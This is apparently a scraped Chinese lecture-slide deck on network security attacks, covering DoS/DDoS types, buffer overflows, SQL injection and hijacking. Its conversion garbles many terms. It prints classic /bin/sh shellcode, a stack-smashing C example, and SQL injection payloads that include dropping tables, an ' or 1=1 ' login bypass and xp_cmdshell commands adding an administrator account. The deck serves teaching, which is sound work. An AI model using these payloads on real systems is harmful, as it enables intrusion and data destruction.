




版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
1、网络协议&网络平安S07网络平安攻击主要知识点缺陷攻击方法回绝效力攻击缓存溢出攻击注入攻击方法劫持攻击方法回绝效力攻击Denial of Service,DoS使系统或网络过载,使之无法继续提供正常效力的平安攻击特点:利用协议的特点或系统的破绽攻击者不用事先获得对系统的控制权,也不是为了获取访问权类型:带宽损耗型bandwidth consumption因大量占用系统例如一个网站的网络带宽,导致受害者系统无法向其客户提供正常效力资源匮乏型resource starvation使目的效力器因宕机或没有足够资源如内存而失去网络效力才干无法正常建立衔接、呼应恳求、传输数据等分布式回绝效力攻击Dist
2、ributed DoS,DDoSDoS攻击是攻击者系统与受害者系统拼资源、拼性能的过程,攻击者假设没有足够带宽和计算才干,就无法耗尽攻击对象的系统资源,DDoS攻击可在同一时间调用大量不同位置的计算机向同一目的实施攻击DDoS攻击类型DDoS三种技术类型:1利用协议破绽Syn FloodSmurfFake IP2利用软件缺陷TearDropPing-of-DeathLandICMP Fragment3进展资源比拼ICMP FloodUDP Flood BombSyn Flood攻击同步洪水攻击也称为TCP同步攻击、三次握手攻击、半衔接攻击技术原理:基于TCP建立衔接所用的三次握手机制,故意短少
3、第三步的ACK回复,使被叫方计算机的衔接不断处于占用资源的等待形状,直到计时器超时释放,假好像时存在大量的半衔接,计算机就会耗尽系统资源,无法为正常业务提供效力改良:运用不同IP地址,使接纳方难以甄别不正常流量 大量的SYN几乎同时从傀儡机群发出,在衔接等待计时器超时前突破系统资源上限Land攻击登陆攻击对Syn Flood攻击的改良技术原理:把SYN报文的源和目的IP地址均设置为被攻击者的IP地址,使之向本人回复SYN-ACK和ACK报文,能够由此建立起自环的空衔接,占用更长时间和更多资源SYN(IP1IP1)SYN(IP1IP1)SYN-ACK(IP1IP1)SYN-ACK(IP1IP1)
4、SYN-ACK(IP1IP1)ACK(IP1IP1)IP1ACK(IP1IP1)ACK(IP1IP1)Ping of Death攻击死亡回显攻击利用ICMP效力端协议机实现的缺陷实施DoS攻击技术原理:假定某操作系统规定ICMP报文最大尺寸不超越64KB,却不进展严厉检查,攻击者故意发送超越64KB上限的畸形ping报文基于ICMP回显功能,主机就会出现性质严重的内存分配错误,导致解体、死机向目的主机长时间、延续性、大批量地发送ICMP报文,将构成ICMP风暴,使主机耗费大量的计算资源,疲于奔命Smurf攻击Smurf回显攻击死亡回显攻击的一种变化技术原理:向一个拥有大量主机的内部子网发送欺骗
5、性ping报文,目的IP地址设为该子网广播地址,而源IP地址设为子网内被攻击主机的地址早期版本的某些型号路由器接纳到该ICMP报文后予以转发一切主机收到报文后进展echo,结果目的主机将同时收到大量ICMP报文反复运用Smurf攻击,能够使子网因广播风暴而瘫痪Fraggle攻击与Smurf类似,运用UDP的echoUDP Flood攻击UDP洪水攻击死亡回显攻击的变化之一技术原理:攻击者随机地向被攻击系统的端口发送UDP数据报文当目的系统接纳到一个UDP数据报文,会根据目的端口号试图确定正在等待侦听中的运用程序,假设发现运用程序并不存在,就根据报文中源IP地址回复一个ICMP报文,报告“目的地
6、址无法衔接假设向目的主机的随机端口不断发送随机端口号的UDP报文,在忙于处置这些渣滓数据报文的过程中,主机性能不断下降,直到不能提供正常效力UDP Flood攻击改良UDP的chargen和echo效力:chargen效力用于测试目的character generator,端口号19,可对任何接纳到的UDP报文反响随机生成的字符echo效力端口号为7,可对任何接纳到的数据原样原路前往Tear Drop攻击泪滴攻击利用某些TCP/IP实现中分段重组的进程的潜在弱点实施的DoS攻击,属于利用协议机缺陷进展的畸形音讯攻击技术技术原理在TCP/IP协议栈实现中,总是假定可以信任IP报文的控制头所包含的
7、信息某些TCP/IP协议机存在于一些操作系统相关版本中一旦收到含有重叠偏移量的分段数据,会无法处置而解体攻击者据此篡改或恶意设计IP报头,构成错误偏移量指针offset值错位,发送给目的主机,引起主机宕机而终止效力 Bomb攻击电子邮件炸弹攻击主要针对电子邮件效力器系统实施的DoS攻击技术原理:在同一时间内调用大量电子邮件效力器对同一个目的发送巨量电子邮件,使得该电子邮件效力器无法正常对外效力,或因超出其处置才干而解体Fake IP攻击IP欺骗攻击利用虚伪IP报文如伪造IP地址或其他字段、伪造IP承载的TCP/UDP报文实施的DoS攻击,也是其他攻击方法的组成部分之一技术原理:利用TCP的RS
8、T位来实现假定有一个合法用户IP地址为A曾经同效力器建立了正常的衔接,攻击者构造TCP报文,把IP源地址设定为A,向效力器发送一个带有RST置位的TCP报文,使效力器误解而释放已有衔接,合法用户发送数据就因效力器失去衔接而无法胜利,不得不重新建立衔接为提升攻击效果,端口号应设置为效力器的重点运用,例如Web效力器的80端口攻击者可伪造大量的IP地址例如该网段的一切主机地址,向目的主机发送TCPRST置位报文,使效力器无法对合法用户进展正常效力缓存溢出攻击Buffer Overflow故意使中心代码的缓冲区发生溢出,进而接纳操作系统的root控制权限如莫里斯蠕虫缓冲区溢出错误是一种非常普遍、非常
9、隐蔽,也非常危险的破绽,程序代码不能完全直接反映缓冲区溢出错误,在各种操作系统、运用软件中广泛存在如今大约80%的平安事件与溢出攻击有关根本技术原理:在软件技术上,假设对缓冲区的边境控制不严厉,甚至不加以控制,一旦越界,会使数据覆盖其他数据区域,引起不可预料的错误数据出错运转代码被破坏栈内存放器被破坏形参和实参被破坏栈内前往地址错误操作系统运转程序的典型缓存构造void func(arg1,arg2,argn)local-var1;local-var2; local-vark; program 危险函数实例void copy8(char * str)char buf8;strcpy(buf,
10、str);printf(“%sn,buf);main( )copy8(“dangrous);main( )copy8(“safe-string);“safe-string前往地址 Return AddrEBPbuf8=safe-strEBPESP进栈ing例:存在平安破绽的系统函数strcpy( )缓存溢出例如C源程序:x打印输出是什么?void main( ) int x; x = 0; pass(1, 2, 3); x = 1; printf(%d, x); int pass(int a, int b, int c) char buffer16; int sum; int *ret; re
11、t = buffer + 20; (*ret) += 10; sum = a + b + c; return sum; 缓存溢出例如分析C源程序:void main( ) int x; x = 0; pass(1, 2, 3); x = 1; printf(%d,x); int pass(int a, int b, int c) char buffer16; int sum; int *ret; ret = buffer + 20; (*ret) += 10; sum = a + b + c; return sum; 汇编被跳过的指令被跳过的指令缓存溢出的利用具有低权限的用户执行程序恢复原有权
12、限能够的方法一:在程序执行的过程中,把目的程序“植入高权限区域,再跳转到目的程序并执行。能够的方法二:在操作系统未恢复用户权限时,改动正常运转过程,跳转到目的程序并执行。获取高级用户甚至超级用户权限从而完全控制目的主机正常流程Trick:程序调用的“库函数即系统函数通常具有系统最高权限。操作系统Shell技术含义OS用户shell用户shell命令控制台可层次嵌套承继前一层权限Shell溢出攻击预备#include void main()char *name2;name0 = /bin/sh;name1 = NULL;execve(name0,name,NULL);exit(0);0 x804
13、82c7 :jmp 0 x80482e8 0 x80482c9 :pop %esi0 x80482ca :mov %esi,0 x8(%esi)0 x80482cd :xor %eax,%eax0 x80482cf :mov %al,0 x7(%esi)0 x80482d2 :mov %eax,0 xc(%esi)0 x80482d5 :mov $0 xb,%al0 x80482d7 :mov %esi,%ebx0 x80482d9 :lea 0 x8(%esi),%ecx0 x80482dc :lea 0 xc(%esi),%edx0 x80482df :int $0 x800 x80482
14、e1 :xor %ebx,%ebx0 x80482e3 :mov %ebx,%eax0 x80482e5 :inc %eax0 x80482e6 :int $0 x800 x80482e8 :call 0 x80482c9 0 x80482ed :.string “/bin/shchar shellcode =0 x80482c7:0 xeb 0 x2f 0 x5e 0 x89 0 x76 0 x08 0 x31 0 xc00 x80482cf:0 x88 0 x46 0 x07 0 x89 0 x46 0 x0c 0 xb0 0 x0b0 x80482d7:0 x89 0 xf3 0 x8d
15、 0 x4e 0 x08 0 x8d 0 x56 0 x0c0 x80482df:0 xcd 0 x80 0 x31 0 xdb 0 x89 0 xd8 0 x40 0 xcd0 x80482e7:0 x80 0 xe8 0 xdc 0 xff 0 xff 0 xff/b0 x80482ff:in/sh该程序功能为执行name指定的命令行命令;本例为翻开新的shellShell溢出攻击代码目的:拷贝完成后,“buffer地址正好填充进栈内的“前往地址位置思索:为何用strcpy()而 非直接复制?Shell溢出攻击技巧要求: 攻击代码为延续的; 地址指向攻击代码起始位置; 地址恰好覆盖“前往地
16、址。技巧: 多个代码起始地址,提高命中率; 代码以空指令开场,提高命中率; 尝试不同的组合构造,顺应不同的栈构造。注入攻击Injection Attack在网络运用系统用户访问界面例如阅读器上输入事先严密设计的内容恶意代码,并到达攻击目的注入攻击往往针对SQLStructured Query Language,构造化查询言语数据库存取操作,因此常称为SQL注入攻击数据库是网络信息系统的中心,假设数据库系统遭到攻击,不论是引起数据走漏,还是数据遭到篡改、伪造、删除,对系统而言影响必然是最致命的技术原理:数据库访问采用SQL语句实现数据表单、数据字段的存取操作部分SQL语句在逻辑上是正确的,但在网
17、络环境中却能够被人利用,成为系统平安的破绽数据库访问系统构造Internet客户端软件访问阅读器访问客户端软件指定访问方式,不可修正URL或脚本编程访问方式,存在修正能够运用效力器和数据库运用效力器和数据库Web效力器用户终端SQL查询操作实例var CityName;CityName = Request.form (CityName);var sql = select * from OrdersTable where CityName = + CityName + ;假设CityName输入Shanghaiselect * from OrdersTable where CityName =
18、Shanghai 查询订单数据表OrdersTable中一切有关Shanghai的记录SQL注入攻击实例var CityName;CityName = Request.form (CityName);var sql = select * from OrdersTable where CityName = + CityName + ;假设CityName输入Shanghai ; drop table OrdersTable - -select * from OrdersTable where CityName = Shanghai ; drop table OrdersTable - - 分号;
19、表示一个操作的终了和另一个操作的开场;双连字符-指示当前行余下的部分是注释内容,应该忽略数据库将首先检索出OrdersTable中有关Shanghai的一切记录,然后将执行drop table命令,即执行删除OrdersTable数据表!SQL查询操作实例Select * from users where username= username.Text and password= password.Text 输入username和password可用以验证用户合法性SQL注入攻击实例Select * from users where username= username.Text and pa
20、ssword= password.Text 假设username输入or 1 = 1 -Select * from users where username= or 1 = 1 - - and password= anything 由于1=1恒成立,不论password输入什么,用户验证总是得到经过!SQL查询操作实例Web访问中,常用访问方式如:name/abc.asp?id=XX为带参数的ASP动态网页,参数有一个或多个,可为整型或字符串型相关SQL语句如:select * from 表名 where 字段=XXSQL注入攻击实例user为SQL数据库内置变量,为当前衔接的用户的用户名us
21、er类型为nvarchar不同于int类型user与整数型int的0相比较,系统将尝试把user转换为intuser转换必定出错,那么报错将nvarchar值“abc转换为int时发生语法错误!由此获取到当前衔接的用户的用户名“abc!变化获取数据库名:any-site/showdetail.asp?id=49; and user0any-site/showdetail.asp?id=1; and db_name()0假设为“sa那么为超级用户!SQL注入攻击实例site/url.asp?id=1;exec master.xp_cmdshell “net user name password /add - -执行存储过程xp_cmdshell以调用系统命令net,新建了name和password的账号!site/url.asp?id=1;exec master.xp_cmdshell “net localgroup name administrators /add - -将新建的账号name参与管理员组!劫持攻击Kidnaping Attack攻击者经过插入网络通讯系统,改动原有的数据流路由并截取数据,到达窃取信息或篡改信息的目的典型劫持攻击方法:中间人攻击黑洞攻击虫洞攻击Middle-man攻击中间人攻击劫持攻击的一
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 三年级信息技术 雁过留声真有趣教学实录 苏教版
- 乡镇结核病防治工作培训
- 手工缝纫-锁针(教案)-2024-2025学年四年级上册劳动北京版
- 七年级历史上册 第一单元 史前时期 中国境内人类的活动 第1课《中国早期人类的代表-北京人》教学实录 新人教版
- 第三课 学会表达情绪-教学设计-小学心理健康四年级同步备课(大象版)
- 2025合同的违约责任解析
- 2025餐厅摊位租赁合同(合同范本)
- 传染病预防知识讲座
- 2017秋中华书局版九年级历史上册第五单元教学设计:第16课 俄国农奴制改革
- 解决问题的策略(教学设计)-2024-2025学年数学六年级上册苏教版
- 马后炮化工论坛-Aspen官方中文培训资料
- 思想政治素质和品德考核表
- 全国肿瘤防治宣传周活动方案
- 《糖尿病诊疗规范》
- GB/T 34560.2-2017结构钢第2部分:一般用途结构钢交货技术条件
- GB/T 26967-2011一般用喷油单螺杆空气压缩机
- GB/T 17457-1998球墨铸铁管水泥砂浆离心法衬层一般要求
- 基于CAN通讯的储能变流器并机方案及应用分析报告-培训课件
- 医院清洁消毒与灭菌课件
- 消防安装工程施工方案Word版
- 软管管理规定3篇
评论
0/150
提交评论